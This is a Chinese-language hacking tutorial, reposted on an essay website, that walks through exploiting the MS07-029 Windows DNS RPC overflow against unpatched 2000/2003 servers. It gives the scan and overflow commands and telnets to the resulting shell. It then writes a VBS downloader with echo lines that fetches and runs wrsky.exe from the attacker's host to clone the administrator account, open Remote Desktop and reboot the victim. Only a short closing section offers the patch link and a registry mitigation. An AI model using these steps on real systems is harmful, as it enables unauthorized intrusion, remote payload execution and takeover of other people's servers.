首页 爱情文章 亲情文章 友情文章 生活随笔 校园文章 经典文章 人生哲理 励志文章 搞笑文章 心情日记
  • 爱情文章
  • 亲情文章
  • 友情文章
  • 生活随笔
  • 校园文章
  • 经典文章
  • 人生哲理
  • 励志文章
  • 搞笑文章
  • 心情日记
  • 英语文章
  • 范文大全
  • 作文大全
  • 新闻阅读
    •
    当前位置: 山茶花美文网 > 新闻阅读 > 正文

    [MS07-029漏洞利用入侵过程] 没有漏洞的XP系统怎么入侵

    时间:2020-02-18来源:山茶花美文网 本文已影响 山茶花美文网手机站

    前言:

    MS07-029,Windows 域名系统 (DNS) 服务器服务的远程过程调用 (RPC) 管理接口中存在基于堆栈的缓冲区溢出。漏洞的前提是没打补丁,开启DNS服务的所有版本WINDOWS 2000 Server和WINDOWS 2003 Server。

    今天,就让我带领各路英豪,踏上DNS EXP之路。

    我们先来看看所用工具的界面:

    MS07-029漏洞利用入侵过程1

    这就是传说中的利用工具,可以通杀2000SEVER,2003SEVER系统,另外还具备了扫描功能!

    先用它来对主机进行扫描:

    在我们的命令行下输入:“dns –s 目标IP地址”

    MS07-029漏洞利用入侵过程2

    稍等片刻,开放的端口以及操作系统以出现在我们面前,如果出现了如上图所显示的“1029:Vulnerability”那么恭喜你,你马上就会成功得到这台主机的权限了

    上图意思就是1029端口存在漏洞。

    现在我们来最关键的步骤――溢出:

    在命令行内输入

    dns -2003chs *.*.93.189 1029

    其中-2003ch的意思是操作系统的型号,-2003chs即简体中文版的2003系统,

    如果是2000的系统就使用“-2000all”参数,*.*.93.189就是我们的目标IP地址,1029就是刚才扫描出存在漏洞的端口”。

    MS07-029漏洞利用入侵过程3

    出现“Attack sent ,check port 1100”字样,说明已经打开了目标地址的1100端口,我们TELNET上去:TELNET *.*.93.189 1100

    MS07-029漏洞利用入侵过程4

    我们现在已经成功的入侵了对方的电脑,并且得到了管理员的权限。

    下面我给大家介绍一下如何在肉鸡上面开3389,

    在命令行里输入

    @echo with wscript:if .arguments.count^ tony.vbs

    @echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >> tony.vbs

    @echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then .echo "Error:" web.status:.quit >> tony.vbs

    @echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >> tony.vbs

    大概的意思就是在命令行创立一个用来下载的VBS脚本tony.vbs

    然后把开3389的工具上传到你的个人空间,

    我这里用的是火狐开3389的工具,在命令行里输入 cscript tony.vbs http://你空间地址/wrsky.exe c:wrsky.exe

    MS07-029漏洞利用入侵过程5

    “wrsky.exe -c”可以克隆当前管理员帐号

    再输入“c:wrsky.exe -o 3551”

    MS07-029漏洞利用入侵过程6

    意思就是打开对方的远程桌面服务,并且使用3551端口。

    用“wrsky.exe -k”可以检查3389是否开启,开启以后输入“wrsky.exe -r”,对方的电脑就自动重启以后就可以连接上去了。

    在运行里输入"mstsc",登陆上去。

    MS07-029漏洞利用入侵过程7

    那熟悉而又亲切的画面出现在我们面前了。

    如果是2K的系统,还有一个更加傻瓜化的工具open3389,直接运行就可以了,不需要任何参数,不过对方电脑会马上重启。

    另外我还放了其他两个DNS利用工具和一篇ZWELL的精华文章在光盘里,有兴趣的朋友可以自己研究。

    这个漏洞的危害是是分巨大的,目前利用DNS服务RPC漏洞传播的蠕虫病毒VanBot已经出现,变种已经开始疯狂传播。

    WIN 2K或2003的朋友请赶快下载补丁

    http://www.microsoft.com/china/technet/security/bulletin/ms07-029.mspx

    或者打开记事本,输入:

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesDNSParameters]

    "RpcProtocol"=dword:00000004

    保存为扩展名为 .REG 的文件,双击导入,再重新启动 DNS 服务即可。

    • [MS07-029漏洞利用入侵过程] 没有漏洞的XP系统怎么入侵 相关文章:
    • 爱情文章
    • 亲情文章
    • 友情文章
    • 随笔
    • 哲理
    • 励志
    • 范文大全

    最新文章

    热点文章

    推荐访问

    军训远足心得体会 军训爬山心得体会 大学军训徒步拉练感想 军训徒步作文 军训徒步10公里感想 军训徒步心得体会 5分钟演讲中秋节节日 中秋一分钟演讲 中秋节演讲稿4分钟 中秋节演讲稿一分钟 中秋节演讲稿五分钟 3-5分钟 中秋节短篇演讲稿 中秋节演讲稿两分钟 中秋节的演讲稿3分钟 关于中秋节的演讲稿三分钟 孩子体验军训的心得 参加孩子军训活动的感受与收获 家长对孩子军训后的收获和感悟 小孩军训的收获与感悟 学生军训的收获与感悟 孩子军训成长过程家长感悟 孩子军训感悟 孩子军训心得体会 孩子军训的收获与感悟 兵役前训练心得体会 部队当兵的心得 新兵役前教育训练心得体会 预备役军训心得体会 新兵军训感悟

    本文[MS07-029漏洞利用入侵过程] 没有漏洞的XP系统怎么入侵由山茶花美文网整理提供,版权归原作者、原出处所有。

    Copyright © 山茶花美文网 All Rights Reserved.